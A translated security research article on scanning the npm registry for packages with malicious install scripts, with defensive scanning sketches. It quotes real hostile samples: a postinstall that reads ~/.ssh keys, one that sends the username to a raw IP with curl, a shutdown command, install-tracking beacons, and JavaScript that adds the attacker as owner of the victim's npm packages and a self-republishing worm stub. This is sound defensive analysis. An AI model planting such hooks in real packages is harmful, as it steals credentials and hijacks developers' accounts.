Hunting for malicious npm packages
- Translation
Last week we covered how dozens of packages that steal data from environment variables were found in the npm registry. This happened in early August and triggered a wave of interest in npm package security. As commenters on the previous article rightly noted, the problem of untrustworthy packages is as old as package managers themselves, and although things are more or less calm now, no one is immune to problems of various scales. For example, malicious code introduced in a routine update of a popular package could cause a real catastrophe. Finding dangerous packages is not easy, and it is approached from different angles. Today we want to share the story of how Duo Labs hunted for malicious npm packages.
A few words about dangerous packages
The names of the recently discovered packages that steal data from environment variables were chosen to exploit typos: a developer who mistypes the name of a well-known package when running npm install gets the malicious package instead. The danger is that secret keys and other sensitive information are often stored in environment variables. If an administrator accidentally installs such a package, everything of value is collected and sent to the attacker. In this particular attack, the malicious packages also declared the real, similarly named packages as dependencies, so the package the developer wanted is installed as well and the developer will most likely notice nothing suspicious.
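The name trick described above can be checked for mechanically. The following is a minimal sketch, not the method used in the study: it compares a candidate name against a short, hypothetical list of well-known packages (POPULAR is an assumption made for illustration) using the standard library's difflib, and the 0.85 threshold is an arbitrary choice.

```python
from difflib import SequenceMatcher

# Hypothetical list of well-known package names, for illustration only.
POPULAR = ["cross-env", "mongoose", "babel-cli", "node-fetch"]


def normalize(name):
    """Drop separators so that 'cross-env' and 'crossenv' compare as equal."""
    return name.lower().replace("-", "").replace("_", "").replace(".", "")


def likely_typosquat_of(candidate, popular=POPULAR, threshold=0.85):
    """Return the popular name that `candidate` closely imitates, or None."""
    if candidate in popular:
        return None  # this is the real package, not an imitation
    for real in popular:
        ratio = SequenceMatcher(None, normalize(candidate), normalize(real)).ratio()
        if ratio >= threshold:
            return real
    return None


for name in ["crossenv", "mongose", "lodash"]:
    print(name, "->", likely_typosquat_of(name))
```

A similarity check like this only flags candidates for manual review. Legitimate packages often have similar names, so a match is a hint and not proof of malice.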
npm has some history of dealing with malicious code, both in compromised legitimate packages and in packages designed from the start to perform unwanted actions, so we decided to analyze the entire npm repository and hunt for other malicious packages.
A history of npm troubles
The recent hype around malicious packages in the npm repository is far from the first such incident. In 2016, a developer unpublished his npm packages in response to a name dispute. Many other packages depended on them, so the unpublishing caused widespread breakage and raised fears that packages could be hijacked.
In research published this year, a researcher was able to gain direct access to 14% of all npm packages (and indirect access to 54% of packages). He either brute-forced weak account passwords or reused passwords leaked in breaches of services not directly related to npm. This led to mass password resets across npm.
The potential impact of compromised or malicious packages is compounded by the way the npm ecosystem is structured. npm encourages the development of small packages that depend on many other packages, which has produced a dense network of small, heavily interdependent packages. In the credential study mentioned above, the author gained access to some very popular packages, which gave him the potential to mount a much larger attack on the npm ecosystem than would be possible without such strong interdependence between packages.
For example, here is a dependency graph for the top 100 npm packages prepared by GraphCommons.
Dependency graph of the top 100 npm packages
How malicious npm packages take over systems
The incidents described above involved ordinary developers with no malicious intent. But what if something similar were organized by an attacker? How could he exploit access to other people's packages for personal gain?
The easiest way to carry out an attack is to use npm's preinstall and postinstall scripts. This is how the recently discovered malicious packages worked. These scripts are system commands specified in the package's package.json file, and they are executed, respectively, before and after the package is installed. Note that these commands can be anything.
In itself, this feature is useful: such scripts are often used to help with complex installation setups. However, they also give an attacker who controls a compromised or deliberately malicious package a way to run commands on the installing machine, and therefore to compromise systems.
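To make the mechanism concrete, here is a minimal sketch of how the install-time scripts declared in a package.json can be listed. The manifest below is hypothetical, and the helper name install_hooks is an assumption made for illustration; the only npm behavior relied on is that preinstall, install and postinstall run automatically during installation.

```python
import json

# Lifecycle scripts that npm runs automatically while installing a package,
# in the order in which they run.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def install_hooks(package_json_text):
    """Return [(hook, command)] for the install-time scripts in a package.json."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts") or {}
    return [(hook, scripts[hook]) for hook in INSTALL_HOOKS if hook in scripts]


# Hypothetical manifest: "test" only runs on request, "postinstall" runs on install.
example = json.dumps({
    "name": "example-package",
    "scripts": {"test": "mocha", "postinstall": "node setup.js"},
})

print(install_hooks(example))
```

Reviewing this list before installing an unfamiliar package is a cheap first check, since anything that appears in it will be executed with the installing user's privileges.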
With all this in mind, let's analyze the npm registry to detect potentially dangerous packages.
Hunt for Malicious Packages
▍Download data for analysis
The first step in our analysis was to obtain package information. The npm registry is based on CouchDB (registry.npmjs.com). It used to have an endpoint, /-/all, that returned information on all packages as JSON, but this feature has since been disabled. For our purposes we can use the copy of the registry at replicate.npmjs.com instead. We apply the same technique that other libraries use to obtain a copy of the JSON data for each package:
curl https://replicate.npmjs.com/registry/_design/scratch/_view/byField > npm.json
Then we use the JSON processing tool jq to extract the package names, scripts and download URLs from the received data. This neat one-liner does the job:
cat npm.json | jq '[.rows | to_entries[] | .value | objects | {"name": .value.name, "scripts": .value.scripts, "tarball": .value.dist.tarball}]' > npm_scripts.json
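For readers who prefer not to use jq, the same extraction can be sketched in Python. This is only an approximation of the one-liner above: it assumes, as the jq filter does, that each entry of rows is an object whose value field holds name, scripts and dist.tarball, and it quietly treats malformed entries as empty instead of raising an error. The function name extract_scripts and the sample data are hypothetical.

```python
import json


def extract_scripts(registry_dump):
    """Keep only the name, scripts and tarball URL of every row in the dump."""
    result = []
    for row in registry_dump.get("rows", []):
        if not isinstance(row, dict):  # plays the role of jq's `objects` filter
            continue
        value = row.get("value")
        if not isinstance(value, dict):  # assumption: treat odd rows as empty
            value = {}
        dist = value.get("dist")
        if not isinstance(dist, dict):
            dist = {}
        result.append({
            "name": value.get("name"),
            "scripts": value.get("scripts"),
            "tarball": dist.get("tarball"),
        })
    return result


# Tiny hypothetical sample in the assumed shape of npm.json.
sample = {"rows": [
    {"id": "a", "value": {"name": "a",
                          "scripts": {"postinstall": "node x.js"},
                          "dist": {"tarball": "https://example.invalid/a.tgz"}}},
    {"id": "b", "value": {"name": "b"}},
]}

print(json.dumps(extract_scripts(sample), indent=2))
```

With the real data, the input would be loaded with json.load from npm.json and the result written to npm_scripts.json with json.dump.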
To simplify the analysis, we put together a quick Python script that does the following:
- Finds packages with preinstall, postinstall or install scripts.
- Finds the files executed by those scripts.
- Searches those files for strings that may indicate suspicious activity.
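The script itself is not shown in the article, so the following is only a rough sketch of how the three tasks listed above might look. All function names are hypothetical, the SUSPICIOUS patterns are an illustrative guess and not the list used in the study, and the file-name heuristic only recognizes .js and .sh files.

```python
import re

INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Hypothetical indicators; a real list would be longer and tuned by hand.
SUSPICIOUS = [
    r"\bcurl\b",
    r"\bwget\b",
    r"\.ssh\b",
    r"npm\s+owner\s+add",
    r"process\.env",
    r"child_process",
]


def packages_with_install_scripts(packages):
    """Task 1: keep packages that define preinstall, install or postinstall."""
    return [
        pkg for pkg in packages
        if any(hook in (pkg.get("scripts") or {}) for hook in INSTALL_HOOKS)
    ]


def files_run_by(command):
    """Task 2: guess which .js/.sh files a script command executes."""
    return re.findall(r"[\w./-]+\.(?:js|sh)\b", command)


def suspicious_hits(text):
    """Task 3: return the indicator patterns that match `text`."""
    return [pattern for pattern in SUSPICIOUS if re.search(pattern, text)]


# Records in the shape produced by the jq one-liner (hypothetical sample).
packages = [
    {"name": "a", "scripts": {"postinstall": "node install.js"}},
    {"name": "b", "scripts": {"test": "mocha"}},
    {"name": "c", "scripts": None},
]

for pkg in packages_with_install_scripts(packages):
    for hook in INSTALL_HOOKS:
        command = pkg["scripts"].get(hook)
        if command:
            print(pkg["name"], hook, files_run_by(command), suspicious_hits(command))
```

In a full pipeline, the files returned by files_run_by would be read from the downloaded tarball and passed through suspicious_hits as well. String matching of this kind produces false positives, so the output is a shortlist for manual review.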
▍Findings
Packages demonstrating the possibility of an attack
Developers have long been aware of the potential dangers of installation scripts. One of our first discoveries was packages that aim to demonstrate this problem in what seems to be a safe way. Here is a summary of the packages:
{
  "name": "maybemaliciouspackage",
  "scripts": {
    "postinstall": "find ~/.ssh | xargs cat || true && echo '\n\n\n\n\n\nOH HEY LOOK SSH KEYS\n\n\n\n\n\n\n'"
  }
},
{
  "name": "deasyncp",
  "scripts": {
    "preinstall": "say U WOT M8; shutdown -s now"
  }
},
{
  "name": "harmlesspackage",
  "scripts": {
"postinstall": "echo '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThanks for your SSH keys :)' && curl -X GET http://104.131.21.155:8043/\\?$(whoami)"
  }
},
{
  "name": "npm-exploit",
  "scripts": {
    "install": "mkdir -p ~/Desktop/sploit && touch ~/Desktop/sploit/haxx"
  }
}
Scripts of curious developers
The next thing we found were scripts that track installations of the package. npm shows some download statistics on the package page, but some authors want more, and collecting it this way is a violation of user privacy. Here are some packages that use Google Analytics or Piwik to track installations.
{
  "name": "npm_scripts_test_metrics",
  "scripts": {
    "preinstall": "curl 'http://google-analytics.com/collect?v=1&t=event&tid=UA-80316857-2&cid=fab8da3e-d191-4637-a138-f7fdf0444736&ec=Pre%20Install&ea=run'",
    "postinstall": "curl 'http://google-analytics.com/collect?v=1&t=event&tid=UA-80316857-2&cid=fab8da3e-d191-4637-a138-f7fdf0444736&ec=Post%20Install&ea=run'"
  }
},
{
  "name": "subtitles-lib",
  "scripts": {
    "postinstall": "bash -c 'curl \"http://avighier.piwikpro.com/piwik.php?idsite=3&rec=1&action_name=$HOSTNAME\"'"
  }
}
In other packages the tracking is less obvious: the data collection is hidden in JavaScript installation files instead of being embedded as shell commands in package.json. Here are some of the similar packages we found. Links lead to the corresponding scripts:
Malicious scripts
Finally, we looked for packages whose installation scripts are outright malicious. Installing such a package has very undesirable consequences for the user's system.
The mr_robot case
While examining the remaining packages, we came across an interesting installation script in the package shrugging-logging. The package itself is very simple: it adds the ASCII shrug emoticon ¯\_(ツ)_/¯ to log messages. However, it has a very nasty postinstall script that gives the package's author (mr_robot) owner rights over the npm packages owned by whoever ran npm install. Here is the corresponding code snippet. The full text of the function can be viewed here.
function currentUser(cb) {
  exec('npm whoami', function (err, stdout, stderr) {
    if (!err) cb(stdout);
  });
}
function addOwner(packageName, newOwner) {
  exec('npm owner add ' + newOwner + ' ' + packageName);
}
function getModulesOwned(user, cb) {
  var url = 'https://www.npmjs.org/~' + user;
  request(url, function (error, response, body) {
    var $ = cheerio.load(body);
    var packages = $('.collaborated-packages a').map(function (i, el) {
      return $(this).text();
    }).get();
    cb(packages);
  });
}
currentUser(function (user) {
  if (user) {
    getModulesOwned(user, function (modules) {
      modules.forEach(function (moduleName) {
        addOwner(moduleName, 'mr_robot');
      });
    });
  }
});
First, the script runs npm whoami to get the name of the current user. It then looks up the packages belonging to this user on npmjs.org. Finally, it uses npm owner add to add mr_robot as an owner of all these packages. This author also published the following packages containing the same backdoor:
- test-module-a
- pandora-doomsday
Modification and publication of local packages
Another malicious script we discovered contains code that is in many ways similar to that of the mr_robot packages, but it has another ace up its sleeve. Instead of simply modifying the owner list of npm packages, the module sdfjghlkfjdshlkjdhsfg is a proof of concept for infecting and republishing local packages. Its installation script demonstrates the process by modifying and publishing itself:
function infectModule (moduleName) {
  installModule(moduleName)
    .then(() => {
      addScript(moduleName);
      copyScript(moduleName);
      return incrementPatchVersion(moduleName);
    })
    .then(() => publishInfectedModule(moduleName))
    .catch(() => {});
}
const MODULE_NAME = "sdfjghlkfjdshlkjdhsfg";
infectModule(MODULE_NAME);
The full source can be found here.
Although this is just a package that proves the possibility of such an attack, the exact same approach can be easily used to attack local packages owned by the user performing the installation.
Summary
It is important to note that none of this is unique to the npm repository. Most package managers, if not all, allow those who write and publish packages to specify commands that run when a package is installed. The problem is perhaps more noticeable in npm because of the dependency structure discussed above.
It is also important to note that this problem is very hard to solve. Static analysis of published npm packages is so difficult that there are entire companies devoted to it.
In addition, statements from npm developers suggest that work is under way to use various metrics to keep users from downloading malicious packages. Take a look, for example, at this Twitter thread.
In the meantime, we recommend that you continue to exercise caution when adding dependencies to your projects. In addition to minimizing the number of dependencies, we recommend strict versioning and integrity checking of all dependencies, which can be done with yarn's built-in tools or with the npm shrinkwrap command. This simple step gives the developer confidence that the code used during development is the same code that reaches production.
Dear readers! Do you protect your systems and Node.js projects from malicious npm packages? If so, please tell us how you do it.